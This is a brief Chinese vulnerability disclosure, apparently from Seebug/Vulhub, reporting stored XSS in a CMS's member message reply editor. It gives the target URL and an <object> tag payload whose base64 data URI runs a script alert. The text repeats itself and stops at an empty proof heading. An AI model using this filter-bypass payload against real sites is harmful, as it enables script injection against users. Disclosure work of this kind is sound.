VULHUB ™

### 简要描述： 存储型xss 指哪打哪 ### 详细说明： 注册一个用户 http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa 回复处用了编辑器 编辑器有些标签没过滤，导致xss执行 xsscode: ``` <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object> ``` object 经过base64 可形成xss语句 [<img src="https://images.seebug.org/upload/201404/0509213211ecfd11535f098a28a12594eba7b02c.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/0509213211ecfd11535f098a28a12594eba7b02c.jpg) [<img src="https://images.seebug.org/upload/201404/05092156d118bec7150590ce96dbc3b0d7e21aeb.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/05092156d118bec7150590ce96dbc3b0d7e21aeb.jpg) [<img src="https://images.seebug.org/upload/201404/05092218bec05552a1ce0b0cb9d479b1d409f26b.jpg" alt="3.jpg" width="600"...

### 简要描述： 存储型xss 指哪打哪 ### 详细说明： 注册一个用户 http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa 回复处用了编辑器 编辑器有些标签没过滤，导致xss执行 xsscode: ``` <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object> ``` object 经过base64 可形成xss语句 [<img src="https://images.seebug.org/upload/201404/0509213211ecfd11535f098a28a12594eba7b02c.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/0509213211ecfd11535f098a28a12594eba7b02c.jpg) [<img src="https://images.seebug.org/upload/201404/05092156d118bec7150590ce96dbc3b0d7e21aeb.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/05092156d118bec7150590ce96dbc3b0d7e21aeb.jpg) [<img src="https://images.seebug.org/upload/201404/05092218bec05552a1ce0b0cb9d479b1d409f26b.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/05092218bec05552a1ce0b0cb9d479b1d409f26b.jpg) ### 漏洞证明：